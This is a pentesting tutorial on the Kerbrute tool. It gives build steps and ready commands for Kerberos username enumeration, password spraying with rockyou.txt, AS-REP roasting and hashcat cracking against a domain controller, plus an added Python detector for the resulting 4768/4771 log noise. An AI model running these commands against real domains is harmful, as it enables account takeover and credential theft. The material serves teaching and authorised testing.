Kerbrute for Pentesters: Username Enumeration & Kerberos Attacks

Category: Pentesting Tools & Techniques
Focus: Active Directory, Kerberos, Enumeration

Kerbrute is a powerful tool built in Go that helps pentesters interact with the Kerberos protocol to:

  • Enumerate valid usernames
  • Perform password spraying
  • Find accounts vulnerable to AS-REP Roasting

It leverages how Kerberos responds to authentication requests to figure out whether a username is valid or not — without needing any initial access. This makes Kerbrute a pre-auth tool, great for early-stage Active Directory attacks.

Kerbrute is most useful during the enumeration and initial access phases of a penetration test, particularly when:

  • You’ve identified a Domain Controller (DC)
  • You know the target domain name
  • You want to confirm valid usernames
  • You want to find roastable accounts (for hash extraction)
  • You want to spray passwords to gain initial access

It’s fast, efficient, and doesn’t require authentication — just a reachable Domain Controller.

# Clone the repo
git clone https://github.com/ropnop/kerbrute.git
cd kerbrute

# Initialize Go modules
go mod tidy

# Build it
go build

# Move the binary to make it global
sudo mv kerbrute /usr/local/bin/

This requires Go to be installed. If it is not, install it with sudo apt install golang -y.

Download the latest release:
https://github.com/ropnop/kerbrute/releases

Kerberos gives different errors for valid vs invalid usernames. Kerbrute exploits this behavior to enumerate users without a password.

kerbrute userenum -d corp.local --dc 192.168.56.101 usernames.txt
# -d = domain name
# --dc = IP address of Domain Controller
# usernames.txt = list of potential usernames

Try a list of common passwords against known users — very useful for initial access.

kerbrute passwordspray -d corp.local --dc 192.168.56.101 users.txt rockyou.txt
# users.txt = list of valid usernames
# rockyou.txt = list of passwords to try

Find users who don’t require pre-authentication and dump hashes to crack offline.

kerbrute asreproast -d corp.local --dc 192.168.56.101 users.txt
# Look for vulnerable user accounts (pre-auth disabled)

This will output hashes in hashcat format. Crack them using:

hashcat -m 18200 asrep_hashes.txt rockyou.txt

  • Kerberos replies with different messages depending on whether the username exists or not.
  • Kerbrute detects these differences and reports valid accounts.
  • For AS-REP roasting, Kerbrute requests a TGT for users without pre-auth — the DC responds with encrypted data that can be cracked offline.

Kerbrute is noisy:

  • Every request hits the Domain Controller and generates logs.
  • Event ID 4768 (Kerberos TGT request) and 4771 (failed pre-auth) are common.
  • Avoid during stealth ops unless you’ve got permission to be loud.
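To show what that noise looks like from the defender's side, here is an added example (not part of the original post and not Kerbrute's own code) that flags a client whose 4768/4771 failures touch many distinct accounts in a short window. The log lines are constructed and the field layout is an assumed simplification of a DC export; the result codes 0x6 (unknown principal) and 0x18 (pre-auth failed) are the standard Kerberos error codes.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample events (not real DC output). Assumed field order:
# timestamp, event id, result code, target account, client address.
SAMPLE_EVENTS = """\
2024-05-01T09:00:01 4768 0x6 jsmith 192.168.56.50
2024-05-01T09:00:01 4768 0x6 asmith 192.168.56.50
2024-05-01T09:00:02 4768 0x6 bjones 192.168.56.50
2024-05-01T09:00:03 4771 0x18 administrator 192.168.56.50
2024-05-01T09:00:03 4768 0x6 cwhite 192.168.56.50
2024-05-01T09:00:04 4771 0x18 svc_backup 192.168.56.50
2024-05-01T09:01:00 4771 0x18 hr-user 192.168.56.77
2024-05-01T09:30:00 4771 0x18 hr-user 192.168.56.77
"""

# 0x6  = KDC_ERR_C_PRINCIPAL_UNKNOWN: the account does not exist (userenum noise)
# 0x18 = KDC_ERR_PREAUTH_FAILED: account exists, wrong password (spray noise)
FAILURE_CODES = {"0x6", "0x18"}


def parse_events(text):
    """Turn the sample lines into event dicts."""
    events = []
    for line in text.splitlines():
        if line.strip():
            ts, eid, code, account, client = line.split()
            events.append({"time": datetime.fromisoformat(ts), "event_id": int(eid),
                           "code": code, "account": account.lower(), "client": client})
    return events


def find_enum_bursts(events, window=timedelta(seconds=60), min_accounts=5):
    """Return {client: accounts} for clients whose 4768/4771 failures touched at
    least min_accounts distinct accounts inside any sliding interval of `window`."""
    by_client = defaultdict(list)
    for ev in events:
        if ev["event_id"] in (4768, 4771) and ev["code"] in FAILURE_CODES:
            by_client[ev["client"]].append(ev)
    flagged = {}
    for client, evs in by_client.items():
        evs.sort(key=lambda e: e["time"])
        for i, start in enumerate(evs):
            hits = {e["account"] for e in evs[i:] if e["time"] - start["time"] <= window}
            if len(hits) >= min_accounts:
                flagged[client] = flagged.get(client, set()) | hits
    return flagged
```

Running find_enum_bursts(parse_events(SAMPLE_EVENTS)) flags only 192.168.56.50; the single failed logon from 192.168.56.77 is ordinary user error and stays below the threshold.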

You found an exposed DC at 192.168.56.101, and the domain is corp.local. You want to:

  1. Find valid usernames: kerbrute userenum -d corp.local --dc 192.168.56.101 users.txt
  2. Try default passwords: kerbrute passwordspray -d corp.local --dc 192.168.56.101 users.txt rockyou.txt
  3. Look for roastable accounts: kerbrute asreproast -d corp.local --dc 192.168.56.101 users.txt

Now you’ve got either a working login or an offline-crackable hash. You’re in business.

  • Use GetNPUsers.py from Impacket as a follow-up for AS-REP roasting.
  • Combine with userlists from /usr/share/seclists/ or harvested via OSINT.
  • Crack offline hashes with hashcat for stealthier access later.
